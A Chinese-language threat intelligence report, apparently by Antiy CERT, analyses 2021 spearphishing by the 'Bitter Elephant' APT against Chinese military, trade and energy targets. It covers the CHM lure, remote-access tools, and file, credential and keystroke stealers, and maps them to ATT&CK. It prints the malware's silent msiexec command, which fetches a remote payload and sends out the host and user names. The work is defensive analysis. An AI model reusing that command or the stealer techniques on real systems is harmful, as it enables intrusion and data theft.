“苦象”組織上半年針對我國的攻擊活動分析
時間 : 2021年07月05日 來源: 安天CERT
1、概述
近期,安天CERT在梳理安全事件時,發(fā)現(xiàn)一批針對我國軍工、貿(mào)易和能源等領(lǐng)域的網(wǎng)絡(luò)攻擊活動。攻擊手法存在偽造身份向目標(biāo)發(fā)送魚叉郵件,投遞惡意附件誘導(dǎo)受害者運行。經(jīng)歸因分析發(fā)現(xiàn),這批活動具備APT組織“苦象”[1]的歷史特征,且在針對目標(biāo)、惡意代碼和網(wǎng)絡(luò)資產(chǎn)等層面均存在關(guān)聯(lián),屬于“苦象”組織在2021年上半年的典型攻擊模式。相關(guān)攻擊活動的特征總結(jié)如下:
表1-1 攻擊活動特征
|
事件要點 |
特征內(nèi)容 |
|
事件概述 |
“苦象”組織的網(wǎng)絡(luò)攻擊活動 |
|
攻擊目標(biāo) |
我國的軍工、貿(mào)易和能源等領(lǐng)域目標(biāo) |
|
攻擊手法 |
魚叉郵件投遞惡意附件,附件包含惡意CHM文件誘導(dǎo)點擊 |
|
攻擊意圖 |
竊密 |
|
攻擊時間 |
2021年4月 |
此外,安天CERT還跟蹤、關(guān)聯(lián)到“苦象”組織上半年使用過的多個竊密插件,其攻擊技術(shù)和代碼功能均帶有該組織的明顯特征,在關(guān)聯(lián)分析章節(jié)我們將對asms和sthost兩個典型插件進行分析。
2、事件分析
2.1 初始誘餌分析
攻擊者會以“會議議程”等郵件主題,偽造受害者可能感興趣的發(fā)件人向目標(biāo)連續(xù)投遞多封魚叉郵件,郵件附件中包含惡意的CHM文件,案例如圖:
圖2-1 附件壓縮包中的內(nèi)容
表2-1 樣本標(biāo)簽
|
病毒名稱 |
Trojan/Script.CHM |
|
原始文件名 |
會議議程.chm |
|
MD5 |
D91B888205AC1CA80C40426B9F5A6105 |
|
文件大小 |
10.60
KB (10856 bytes) |
|
文件格式 |
MS
Windows HtmlHelp Data |
|
LanguageCode |
English
(U.S.) |
“會議議程.chm”為包含惡意腳本的Windows幫助文件,靜態(tài)屬性皆不可用,點擊執(zhí)行后看到的正文為空白:
圖2-2 CHM文件的正文及屬性
此刻,其含有的經(jīng)混淆的惡意腳本被自動運行,作用是添加一個每15分鐘運行一次的系統(tǒng)任務(wù)計劃:
圖2-3 CHM文檔包含的惡意腳本
任務(wù)計劃名為“DefenderService”,操作對象為以msiexec命令運行遠(yuǎn)程的MSI文件,過程完全靜默且不重啟系統(tǒng),同時提交本機的主機名和用戶名:
%coMSPec% /c start /min msiexec /i http://***.com/***/crt.php?h=%computername%*%username% /qn /norestart
攻擊者疑似會針對目標(biāo)選擇性下發(fā)CERT.msi的文件內(nèi)容。CERT.msi負(fù)責(zé)向以下目錄釋放下載器模塊winupd.exe,下載器模塊功能是從C2服務(wù)器獲取一系列的功能插件,保存在同一目錄下:
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\
在觀察到的案例中,陸續(xù)功能插件的選取和部署過程約在半小時內(nèi)完成。
表2-2惡意文件信息列表
|
哈希 |
文件路徑 |
說明(依次落地) |
|
4e1cc7a2e7ba7858b2bdbcbe344410e4 |
C:\Users\***\Downloads\會議議程.zip |
郵件附件 |
|
d91b888205ac1ca80c40426b9f5a6105 |
C:\Users\***\Downloads\會議議程.chm |
.chm文件 |
|
6452e2c243db03ecbcacd0419ff8bebf |
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\winupd.exe |
下載器模塊 |
|
ef099d5fe4075132bf3812c9d5ffa8f9 |
C:\Users\***\AppData\Local\Google\Chrome\User
Data\MtMpEnq.exe |
遠(yuǎn)控插件1 |
|
bd054c4f43808ef37352f36129bf0c3d |
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\mtAdvanced4.exe |
遠(yuǎn)控插件2 |
|
ade9a4ee3acbb0e6b42fb57f118dbd6b |
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\sysmgr.exe |
文件竊取插件 |
|
7abcca95bc9c69d93be133f6597717c0 |
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\mvrs_crsh.exe |
瀏覽器憑證竊密插件 |
|
578918166854037cdcf1bb3a06a7a4f3 |
C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\scvhost.exe |
鍵盤記錄插件 |
2.2 部署插件分析
遠(yuǎn)控插件1:
插件名稱:MtMpEnq.exe
MD5: EF099D5FE4075132BF3812C9D5FFA8F9
功能簡介:該樣本是一個遠(yuǎn)控。主要功能是對文件進行瀏覽、傳輸。也可以執(zhí)行cmd命令。
C2地址為45.11.***.***,端口34318:
圖2-4 遠(yuǎn)控插件1硬編碼的C2
表2-3 遠(yuǎn)控插件1控制指令
|
指令碼 |
功能描述 |
|
2 |
Delete File(刪除文件) |
|
18 |
FileMgr get drives(獲取驅(qū)動器) |
|
19 |
FileMgr get Folders(獲取目錄) |
|
20 |
FileMgr Create File(創(chuàng)建文件) |
|
21 |
FileMgr Copy File(復(fù)制文件) |
|
38 |
FileTransfer Begin(開始文件傳輸) |
|
39 |
FileTransfer Data(進行文件傳輸) |
|
40 |
FileTransfer Complete(結(jié)束文件傳輸) |
|
41 |
FileTransfer for downloading start(從被控端下載文件) |
|
48 |
Get Command(執(zhí)行命令) |
|
49 |
Start Command Prompt(獲取交互shell) |
|
50 |
Stop Command Prompt(結(jié)束交互shell) |
|
51 |
Connection Status(心跳包) |
遠(yuǎn)控插件2:
插件名稱:mtAdvanced4.exe
MD5: BD054C4F43808EF37352F36129BF0C3D
功能簡介:該樣本是一個遠(yuǎn)控。主要功能是對文件進行瀏覽、傳輸。也可以執(zhí)行cmd命令。
C2地址為45.11.***.***,端口80:
圖2-5 遠(yuǎn)控插件2硬編碼的C2
表2-4 遠(yuǎn)控插件2控制指令
|
指令碼 |
功能描述 |
|
18 |
FileMgr get drives(獲取驅(qū)動器) |
|
19 |
FileMgr get Folders(獲取目錄) |
|
38 |
FileTransfer Begin(開始文件傳輸) |
|
39 |
FileTransfer Data(進行文件傳輸) |
|
40 |
FileTransfer Complete(結(jié)束文件傳輸) |
|
41 |
FileTransfer for downloading start(從被控端下載文件) |
|
48 |
Get Command(執(zhí)行命令) |
|
49 |
Start Command Prompt(獲取交互shell) |
|
50 |
Stop Command Prompt(結(jié)束交互shell) |
|
51 |
Connection Status(心跳包) |
文件竊取插件:
插件名稱:sysmgr.exe
MD5: ade9a4ee3acbb0e6b42fb57f118dbd6b
功能簡介:竊取本機文件,將文件數(shù)據(jù)POST回攻擊者服務(wù)器。
選取以下后綴的文件:
表2-5 指定的文件竊取對象
|
指定的后綴名 |
.azr、.bmp、.doc、.docx、.eln、.erq、.err、.jpeg、 .jpg、.neat、.pdf、.ppi、.ppt、.rar、.txt、.xls、.xlsx、.zip |
C2:http://***.net/UihbywscTZ/45Ugty845nv7rt.php,80端口
圖2-6 文件竊密插件的上傳流量
瀏覽器憑證竊密插件:
插件名稱:mvrs_crsh.exe
MD5: 7ABCCA95BC9C69D93BE133F6597717C0
功能簡介:獲取火狐和谷歌瀏覽器保存的用戶名和密碼,保存在文件“en-GB-4-0.txt”。
圖2-7 瀏覽器竊密插件的竊取對象
鍵盤記錄插件:
插件名稱:scvhost.exe
MD5: 578918166854037CDCF1BB3A06A7A4F3
功能簡介:該程序被加入系統(tǒng)注冊表中的Run啟動項,用于記錄目標(biāo)機器上的按鍵行為,并將按鍵信息先寫入臨時緩沖文件“syslog0812AXbcW.tean”,然后匯入最終的存儲文件“syslog0812AXbcW.neat ”。.neat 文件中的數(shù)據(jù)最終會被攻擊者下發(fā)的文件竊取類插件如sysmgr.exe搜尋并上傳。
注冊鍵盤鉤子,記錄按鍵:
圖2-8 擊鍵竊密插件的按鍵記錄功能
檢測到“ctrl+v”后讀取剪貼板內(nèi)容:
圖2-9 擊鍵竊密插件的剪貼板記錄功能
將監(jiān)控到的按鍵信息寫入文件“syslog0812AXbcW.tean”:
圖2-10 擊鍵竊密插件的數(shù)據(jù)保存位置
記錄文件加密方法為每個字節(jié)加0x14(解密時每個字節(jié)減0x14):
圖2-11 擊鍵竊密插件的數(shù)據(jù)加密方法
3、關(guān)聯(lián)分析
安天CERT通過代碼特點、技術(shù)手法和向量特征等技術(shù)進行關(guān)聯(lián)分析,發(fā)現(xiàn)“苦象”組織使用過的數(shù)個功能插件,其中多數(shù)用于在目標(biāo)機器上進行竊密作業(yè)。本章披露的asms和sthost插件與2.2章節(jié)提及的文件竊密插件sysmgr.exe在功能代碼設(shè)計上十分相近,攻擊者以相同邏輯實現(xiàn)類似的文件篩選、過濾、記錄等竊密功能,在規(guī)避檢測方面也使用十分相同的技術(shù)方法。
3.1 asms插件分析
表3-1 竊密樣本標(biāo)簽
|
病毒名稱 |
Trojan/Win32.Stealer |
|
原始文件名 |
asms.exe |
|
MD5 |
B63E9710CB67F4A649A83929ED9F0322 |
|
處理器架構(gòu) |
Intel
386 or later, and compatibles |
|
文件大小 |
101 KB
(103,936 bytes) |
|
文件格式 |
BinExecute/Microsoft.EXE[:X86] |
|
時間戳 |
2008-10-27
18:47:55 |
|
加殼類型 |
無 |
|
編譯語言 |
Microsoft
Visual C++(2008)[msvcrt,wWinMain] |
該插件是“苦象”組織竊取信息的木馬,其主要功能為竊取主機硬盤驅(qū)動器中doc、docx、ppt、pptx、xls、pdf、zip、txt以及apk等類型的文件,同時該竊密木馬還會探測主機是否存在光盤驅(qū)動器,如果存在,則將光盤驅(qū)動器中存在的所有文件也回傳至攻擊的服務(wù)器。
當(dāng)木馬在主機中運行時,首先會進行休眠操作,休眠的秒數(shù)由其自身隨機生成,休眠的目的是為了逃避沙箱的檢測。
圖3-1 隨機休眠3
休眠完成后,木馬會在自身所在目錄下創(chuàng)建名為“errore.log”、“error1log.txt”的文件,error1log.txt文件作用是儲存后續(xù)收集的文件信息,而errore.log文件作用是對自身的操作進行標(biāo)識。
圖3-2 創(chuàng)建errore.log
圖3-3 創(chuàng)建error1log.txt
上述文件創(chuàng)建完成后,木馬開始收集主機中不在排除路徑列表且符合類型的文件信息,包括文件的完整路徑以及文件的創(chuàng)建時間戳。同時,當(dāng)木馬探測到主機中存在光盤驅(qū)動器時,木馬也會收集光盤驅(qū)動器中存在的文件。收集信息完成后,木馬則會將收集的文件信息以“創(chuàng)建時間戳_文件路徑||” 的形式寫入error1log.txt。
圖3-4 攻擊者需要收集的類型
圖3-5 需要排除的路徑
圖3-6 收集文件信息
圖3-7 搜索指定類型文件
圖3-8 將收集的信息寫入error1log.txt
圖3-9 error1log.txt文件內(nèi)容
完成收集信息操作后,木馬會在當(dāng)前目錄下創(chuàng)建cachex86.tmp,cachex86.tmp的作用是存儲由38位隨機字符加機器名形成唯一標(biāo)識符,標(biāo)識符的作用在于后續(xù)回傳竊取的信息時對受害主機進行區(qū)分。
圖3-10 將標(biāo)識符寫入cachex86.tmp文件
圖3-11 cachex64.tmp
最后,木馬會將存儲文件信息的error1log.txt以及收集的文件以不加密的方式回傳至攻擊者的C2服務(wù)器。
圖3-12 回傳收集的信息
圖3-13 回傳error1log.txt的流量
圖3-14 回傳文件的流量
3.2 sthost插件分析
表3-2 竊密樣本標(biāo)簽
|
病毒名稱 |
Trojan/Win32.Stealer |
|
原始文件名 |
sthost.exe |
|
MD5 |
0159DF64E95A4BC0FC1AAFE4AA7FD3B6 |
|
處理器架構(gòu) |
Intel
386 or later, and compatibles |
|
文件大小 |
17.5
KB (17,920 字節(jié)) |
|
文件格式 |
BinExecute/Microsoft.EXE[:X86] |
|
時間戳 |
2090-01-13
05:08:25 |
|
加殼類型 |
無 |
|
編譯語言 |
Microsoft Visual C# / Basic .NET |
該插件為竊密類木馬,時間戳經(jīng)過偽造,內(nèi)部字符串等信息使用AES加密,運行后解密使用。樣本會收集主機基本信息回傳,收集指定后綴文件路徑并記錄到文本,然后根據(jù)關(guān)注的重點路徑和文件修改時間進行篩選,最后對篩選的文件進行回傳。
樣本在主函數(shù)中首先對加密字符串進行解密,其加密字符串首先將空格替換成加號,進行base64解碼,隨后利用內(nèi)置密碼通過使用基于HMACSHA1的偽隨機數(shù)生成器,實現(xiàn)基于密碼的密鑰派生,生成AES算法密鑰和初始化向量,最終解密字符串,解密算法如下所示:
圖3-15 字符串解密
解密出的字符串如下所示:
圖3-16 解密結(jié)果
樣本解密字符串后,進入無限循環(huán),用于獲取指定系統(tǒng)信息與文件信息并回傳,并且每次獲取回傳都會間隔較長時間:
圖3-17 獲取信息回傳
回傳的系統(tǒng)信息經(jīng)過簡單的凱撒加密,算法如下所示:
圖3-18 系統(tǒng)信息加密
在獲取信息時,樣本自定義了一個Listing的類用于文件信息收集功能,該類初始化結(jié)果如下:
圖3-19 信息收集Listing類
其中RequiredExtension為需要收集的文件后綴,BlacklistFolder為無需遍歷的文件夾名稱。最后生成的文件內(nèi)容格式為“文件路徑|ddMMyyyy|HHmmss”,實驗環(huán)境中如下所示:
圖3-20 收集的信息內(nèi)容和格式
該類還實現(xiàn)了通過文件最后修改時間(100天內(nèi))和文件路徑進行篩選的功能。
圖3-21 根據(jù)最后寫入時間進行分類
圖3-22 根據(jù)路徑進行篩選
最終將篩選出的文件進行上傳:
圖3-23 上傳文件
4、威脅框架視角的攻擊映射
本次系列攻擊活動共涉及ATT&CK框架中10個階段的18個技術(shù)點,具體行為描述如下表:
表4-1 近期“苦象”組織攻擊活動的技術(shù)行為描述表
|
ATT&CK階段 |
具體行為 |
注釋 |
|
偵察 |
搜集受害者組織信息 |
收集受害者所屬組織,針對性地偽裝成受害者感興趣的身份 |
|
資源開發(fā) |
獲取基礎(chǔ)設(shè)施 |
注冊購買服務(wù)器及域名等網(wǎng)絡(luò)基礎(chǔ)設(shè)施 |
|
建立賬戶 |
注冊釣魚等所用的郵箱賬號 |
|
|
初始訪問 |
網(wǎng)絡(luò)釣魚 |
發(fā)送魚叉郵件,附件投遞誘餌文件 |
|
執(zhí)行 |
誘導(dǎo)用戶執(zhí)行 |
誘導(dǎo)用戶點擊執(zhí)行惡意的CHM幫助文件 |
|
利用命令和腳本解釋器 |
利用CMD命令運行遠(yuǎn)程載荷 |
|
|
持久化 |
利用自動啟動執(zhí)行引導(dǎo)或登錄 |
將自身添加進注冊表的Run啟動項 |
|
利用計劃任務(wù)/工作 |
添加計劃任務(wù)運行遠(yuǎn)程MSI載荷 |
|
|
憑證訪問 |
從存儲密碼的位置獲取憑證 |
從火狐/谷歌瀏覽器的默認(rèn)存儲位置獲取憑證 |
|
輸入捕捉 |
捕捉記錄用戶的擊鍵記錄,關(guān)注賬號密碼 |
|
|
發(fā)現(xiàn) |
發(fā)現(xiàn)文件和目錄 |
竊取文件時,發(fā)現(xiàn)并排除部分不需關(guān)注的目錄 |
|
發(fā)現(xiàn)系統(tǒng)所有者/用戶 |
發(fā)現(xiàn)系統(tǒng)的主機名和用戶名 |
|
|
收集 |
壓縮/加密收集的數(shù)據(jù) |
捕獲的用戶輸入經(jīng)加密保存在本地文件 |
|
收集剪貼板數(shù)據(jù) |
捕捉記錄用戶的Ctrl+V行為 |
|
|
輸入捕捉 |
捕捉記錄用戶的擊鍵記錄 |
|
|
命令與控制 |
使用應(yīng)用層協(xié)議 |
部分回傳過程采用HTTP協(xié)議 |
|
使用加密信道 |
部分回傳的數(shù)據(jù)經(jīng)自定義加密 |
|
|
數(shù)據(jù)滲出 |
使用C2信道回傳 |
數(shù)據(jù)回傳至C2服務(wù)器 |
將涉及到的威脅行為技術(shù)點映射到ATT&CK框架如下圖所示:
圖4-1 近期“苦象”組織攻擊活動對應(yīng)ATT&CK映射圖
附錄:參考連接
[1] “苦象”組織近期網(wǎng)絡(luò)攻擊活動及泄露武器分析